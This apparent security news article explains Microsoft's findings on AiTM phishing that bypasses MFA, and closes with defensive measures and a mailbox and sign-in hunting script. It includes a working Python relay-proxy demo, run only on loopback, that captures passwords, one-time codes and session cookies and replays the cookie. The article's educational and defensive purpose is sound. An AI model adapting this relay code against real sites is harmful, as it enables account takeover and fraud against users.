Wed | Jul 13, 2022 | 12:44 PM PDT

Summertime is great for so many things. Warmer weather, longer nights, cold drinks, hiking, biking, fishing, and... phishing.

Yes, while you are out on vacation enjoying all the good things that come with summer, cybercriminals are still hunkered down in their virtual caves creating new phishing schemes to make everyone's lives more difficult.

Microsoft recently said it discovered a massive phishing campaign that used adversary-in-the-middle (AiTM) phishing sites to steal passwords, hijack a user's sign-in session, and skip the authentication process even if the user had enabled multi-factor authentication (MFA).

The threat actors behind this campaign then used the stolen credentials and session cookies for follow-on business email compromise (BEC) campaigns against other targets.

Microsoft says the AiTM phishing campaign has attempted to target more than 10,000 organizations since September 2021.

What is adversary-in-the-middle (AiTM) phishing?

According to Microsoft's 2021 Digital Defense Report, phishing remains the most common type of malicious email observed in its threat signals. It notes that while MFA provides an additional layer of security, and many organizations have adopted or plan to adopt it, threat actors are finding ways to circumvent it. One of these ways is AiTM phishing. So what is it?

Microsoft dives into this question:

"In AiTM phishing, an attacker attempts to obtain a target user's session cookie so they can skip the whole authentication process and act on the latter’s behalf.  

To do this, the attacker deploys a webserver that proxies HTTP packets from the user that visits the phishing site to the target server the attacker wishes to impersonate and the other way around. This way, the phishing site is visually identical to the original website (as every HTTP request is proxied to and from the original website).

The attacker also doesn’t need to craft their own phishing site like how it’s done in conventional phishing campaigns. The URL is the only visible difference between the phishing site and the actual one."

Microsoft provides a visual representation of this process:

Diagram with icons illustrates a phishing site, which is connected to a malicious proxy server, in between a user and the target website the user is trying to access. Texts and arrows describe the process of how the AiTM phishing website intercepts the authentication process.

The report continues to describe the process:

"The phishing page has two different Transport Layer Security (TLS) sessions—one with the target and another with the actual website the target wants to access. These sessions mean that the phishing page practically functions as an AiTM agent, intercepting the whole authentication process and extracting valuable data from the HTTP requests such as passwords and, more importantly, session cookies.

Once the attacker obtains the session cookie, they can inject it into their browser to skip the authentication process, even if the target's MFA is enabled."

Microsoft says it detected multiple iterations of the AiTM phishing campaign, targeting more than 10,000 organizations over the past year, and that the campaign's infrastructure uses the Evilginx2 phishing kit, an open-source reverse-proxy framework built for exactly this kind of attack.
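To make the relay concrete, here is an added example (not code from Microsoft's report or from Evilginx2) that models the three parties on loopback: a target site that demands a password plus a one-time code and then issues a session cookie, a phishing proxy that relays every request and response while keeping a copy of the credentials and the Set-Cookie header, and an attacker that replays the captured cookie straight at the target. The account, the fixed one-time code, the cookie name and the use of plain HTTP on 127.0.0.1 instead of the two TLS sessions Microsoft describes are all assumptions of this demo.

```python
"""Adversary-in-the-middle (AiTM) phishing modelled on loopback over plain HTTP.
The real attack terminates two TLS sessions (victim<->proxy, proxy<->site); the
relaying in between, which is what captures the cookie, is what this shows.
Parties: target (the real site), proxy (the phishing site), attacker (cookie replay)."""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

USERS = {"alice": {"password": "hunter2", "otp": "123456"}}  # constructed account
SESSIONS = {}     # session id -> user, filled by the target after a complete login
CAPTURED = {"credentials": [], "set_cookie": []}   # what the proxy keeps for itself


class Target(BaseHTTPRequestHandler):
    # The real site: password + one-time code at /login, then the cookie alone
    # authenticates every later request (this is the property the attack abuses).
    log_message = lambda self, *a: None   # silence per-request logging

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        form = {k: v[0] for k, v in parse_qs(body).items()}
        user = USERS.get(form.get("user"))
        if self.path == "/login" and user and (form.get("password"), form.get("otp")) == (user["password"], user["otp"]):
            sid = secrets.token_hex(16)
            SESSIONS[sid] = form["user"]
            self.send_response(302)
            self.send_header("Set-Cookie", f"session={sid}; HttpOnly")
            self.send_header("Location", "/mailbox")
        else:
            self.send_response(401)
        self.end_headers()

    def do_GET(self):
        cookie = self.headers.get("Cookie", "")
        sid = cookie[len("session="):] if cookie.startswith("session=") else None
        if self.path == "/mailbox" and sid in SESSIONS:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(f"inbox of {SESSIONS[sid]}".encode())
        else:
            self.send_response(302)
            self.send_header("Location", "/login")
            self.end_headers()


def make_proxy(target_port):
    class Proxy(BaseHTTPRequestHandler):
        # The phishing site: a transparent relay that reads everything passing through.
        log_message = lambda self, *a: None

        def relay(self):
            length = int(self.headers.get("Content-Length", 0))
            body = self.rfile.read(length) if length else None
            if self.command == "POST" and self.path == "/login":   # password and MFA code in the clear
                CAPTURED["credentials"].append({k: v[0] for k, v in parse_qs(body.decode()).items()})
            # Only Host is rewritten; a real kit also rewrites absolute URLs and cookie domains.
            headers = {k: v for k, v in self.headers.items() if k.lower() != "host"}
            headers["Host"] = f"127.0.0.1:{target_port}"
            conn = http.client.HTTPConnection("127.0.0.1", target_port)
            conn.request(self.command, self.path, body=body, headers=headers)
            resp = conn.getresponse()
            data = resp.read()
            self.send_response(resp.status)   # adds Server/Date itself, so those are skipped below
            for name, value in resp.getheaders():
                if name.lower() == "set-cookie":
                    CAPTURED["set_cookie"].append(value)    # the session cookie: the real prize
                if name.lower() not in ("content-length", "transfer-encoding", "server", "date"):
                    self.send_header(name, value)
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        do_GET = do_POST = relay

    return Proxy


def serve(handler):
    srv = HTTPServer(("127.0.0.1", 0), handler)   # port 0: any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    target = serve(Target)
    proxy = serve(make_proxy(target.server_port))
    # 1. The victim logs in at the phishing site; password and code are relayed and accepted.
    victim = http.client.HTTPConnection("127.0.0.1", proxy.server_port)
    victim.request("POST", "/login", body="user=alice&password=hunter2&otp=123456",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})
    victim_status = victim.getresponse().status
    # 2. The attacker injects the captured cookie into their own browser and goes
    #    straight to the real site: no password, no second factor, no proxy.
    stolen = CAPTURED["set_cookie"][-1].split(";")[0]     # "session=<id>"
    attacker = http.client.HTTPConnection("127.0.0.1", target.server_port)
    attacker.request("GET", "/mailbox", headers={"Cookie": stolen})
    attacker_resp = attacker.getresponse()
    result = {
        "victim_login_status": victim_status,               # 302: login went through
        "captured_credentials": CAPTURED["credentials"][-1],
        "attacker_status": attacker_resp.status,            # 200: the cookie is enough
        "attacker_page": attacker_resp.read().decode(),
    }
    for srv in (target, proxy):
        srv.shutdown()
    return result


if __name__ == "__main__":
    print(run_demo())
```

Note that the cookie's HttpOnly flag changes nothing: the proxy never runs in the victim's browser, it reads the header off the wire. The same holds for a TOTP code or a push approval, because the factor is relayed in real time and consumed by the real site.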

Defending against AiTM phishing

Microsoft stresses that although AiTM phishing emerged specifically to bypass MFA, MFA remains an essential control that still stops a wide range of attacks, including any that rely on a stolen password alone. The bypass works because the relayed factors (a password, a one-time code, a push approval) are not tied to the site the user is really talking to; Microsoft's report therefore also recommends phishing-resistant methods such as FIDO2 security keys and certificate-based authentication, which bind the credential to the origin and cannot be replayed through a proxy.

Alongside MFA, it says organizations should adopt the following measures to better protect themselves:

  • Enable conditional access policies. Conditional access policies are evaluated and enforced every time an attacker attempts to use a stolen session cookie. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as compliant devices or trusted IP address requirements.

  • Invest in advanced anti-phishing solutions that monitor and scan incoming emails and visited websites. For example, organizations can leverage web browsers that can automatically identify and block malicious websites, including those used in this phishing campaign.

  • Continuously monitor for suspicious or anomalous activities:
    • Hunt for sign-in attempts with suspicious characteristics (for example, location, ISP, user agent, use of anonymizer services).

    • Hunt for unusual mailbox activities such as the creation of Inbox rules with suspicious purposes or unusual amounts of mail item access events by untrusted IP addresses or devices.
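The two hunting bullets above translate into simple detection logic. The following is an added example, not part of Microsoft's report, run over constructed sign-in and mailbox audit records; the record fields, the trusted network range, the anonymizer ISP names and the access threshold are all assumptions to be mapped onto the schema your identity provider and mail platform actually emit. The sign-in rule keys on the fact that a replayed cookie arrives from a different IP, ISP and user agent than the interactive sign-in that satisfied MFA, and the mailbox rule looks for the inbox rules and bulk access that precede BEC.

```python
"""Hunting for AiTM follow-on activity in sign-in and mailbox audit records.
Record shapes and field names are assumptions for this example; map them onto the
schema your identity provider and mail platform actually emit."""
import ipaddress

TRUSTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]   # constructed: the organisation's egress
ANONYMIZERS = {"tor exit", "vpn-anon"}                      # constructed: ISP names treated as anonymizers
HIDE_FOLDERS = {"rss subscriptions", "rss feeds", "junk email", "deleted items", "archive", "conversation history"}
PAYMENT_WORDS = ("invoice", "payment", "wire", "bank")
ACCESS_THRESHOLD = 200     # MailItemsAccessed events in one window that count as bulk collection

# Constructed records. "mfa" True marks the interactive sign-in that completed MFA;
# later rows with the same session id were authenticated by the session cookie alone.
SIGNINS = [
    {"ts": "10:00", "user": "alice", "session": "s1", "ip": "203.0.113.10", "isp": "CorpNet",  "ua": "Edge/103 Windows", "mfa": True},
    {"ts": "10:07", "user": "alice", "session": "s1", "ip": "198.51.100.7", "isp": "vpn-anon", "ua": "Chrome/103 Linux", "mfa": False},
    {"ts": "10:30", "user": "bob",   "session": "s2", "ip": "203.0.113.22", "isp": "CorpNet",  "ua": "Edge/103 Windows", "mfa": True},
    {"ts": "11:00", "user": "bob",   "session": "s2", "ip": "203.0.113.22", "isp": "CorpNet",  "ua": "Edge/103 Windows", "mfa": False},
]
MAILBOX_AUDIT = [
    {"ts": "10:09", "user": "alice", "op": "New-InboxRule", "ip": "198.51.100.7",
     "params": {"Name": ".", "SubjectContainsWords": "invoice;payment", "MoveToFolder": "RSS Subscriptions", "MarkAsRead": True}},
    {"ts": "10:10", "user": "alice", "op": "MailItemsAccessed", "ip": "198.51.100.7", "count": 340},
    {"ts": "10:35", "user": "bob",   "op": "New-InboxRule", "ip": "203.0.113.22",
     "params": {"Name": "Team updates", "FromAddressContainsWords": "team@example.com", "MoveToFolder": "Team"}},
    {"ts": "10:40", "user": "bob",   "op": "MailItemsAccessed", "ip": "203.0.113.22", "count": 25},
]


def untrusted(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def hunt_signins(signins):
    """Flag cookie-authenticated sign-ins whose context differs from the one that
    completed MFA, and any sign-in through a known anonymizer service."""
    mfa_context = {}   # session id -> (ip, isp, ua) at the time MFA was satisfied
    hits = []
    for s in signins:
        ctx = (s["ip"], s["isp"], s["ua"])
        if s["mfa"]:
            mfa_context[s["session"]] = ctx
            continue
        reasons = []
        first = mfa_context.get(s["session"])
        if first is None:
            reasons.append("session cookie used with no recorded MFA sign-in")
        else:
            reasons += [f"{field} changed: {a} -> {b}"
                        for field, a, b in zip(("ip", "isp", "user agent"), first, ctx) if a != b]
        if s["isp"].lower() in ANONYMIZERS:
            reasons.append(f"anonymizer service: {s['isp']}")
        if reasons:
            hits.append({"ts": s["ts"], "user": s["user"], "ip": s["ip"], "reasons": reasons})
    return hits


def hunt_mailbox(audit):
    """Flag inbox rules built to hide mail, and bulk mail access from untrusted addresses."""
    hits = []
    for e in audit:
        reasons = []
        if e["op"] == "New-InboxRule":
            p = e["params"]
            if p.get("MoveToFolder", "").lower() in HIDE_FOLDERS or p.get("DeleteMessage"):
                reasons.append("rule hides or deletes matching mail")
            if p.get("MarkAsRead"):
                reasons.append("rule marks mail as read")
            if p.get("ForwardTo") or p.get("RedirectTo"):
                reasons.append("rule forwards mail")
            if not p.get("Name", "").strip(" .,-_"):
                reasons.append("rule name is empty or punctuation only")
            if any(w in p.get("SubjectContainsWords", "").lower() for w in PAYMENT_WORDS):
                reasons.append("rule keys on payment terms")
            if reasons and untrusted(e["ip"]):
                reasons.append(f"created from untrusted IP {e['ip']}")
        elif e["op"] == "MailItemsAccessed" and e["count"] >= ACCESS_THRESHOLD and untrusted(e["ip"]):
            reasons.append(f"{e['count']} mail items accessed from untrusted IP {e['ip']}")
        if reasons:
            hits.append({"ts": e["ts"], "user": e["user"], "ip": e["ip"], "op": e["op"], "reasons": reasons})
    return hits


def correlate(signin_hits, mailbox_hits):
    """Users whose flagged sign-in and flagged mailbox activity share a source IP:
    the cookie replay followed by the BEC set-up, reported as one incident."""
    suspicious = {(h["user"], h["ip"]) for h in signin_hits}
    return sorted({h["user"] for h in mailbox_hits if (h["user"], h["ip"]) in suspicious})


if __name__ == "__main__":
    for hit in hunt_signins(SIGNINS) + hunt_mailbox(MAILBOX_AUDIT):
        print(hit)
    print("incidents:", correlate(hunt_signins(SIGNINS), hunt_mailbox(MAILBOX_AUDIT)))
```

On these records only alice is flagged: her session cookie reappears seven minutes after MFA from a different IP, ISP and user agent through an anonymizer, and from that same IP an inbox rule named "." moves anything mentioning invoices or payments into RSS Subscriptions and marks it read, followed by a bulk read of the mailbox. Correlating the two on user and source IP is what turns two alerts into the single AiTM-to-BEC incident Microsoft describes; bob's ordinary cookie reuse from the corporate network and his benign rule produce nothing.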

For more technical information on AiTM phishing campaigns, read the report from Microsoft, From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud.
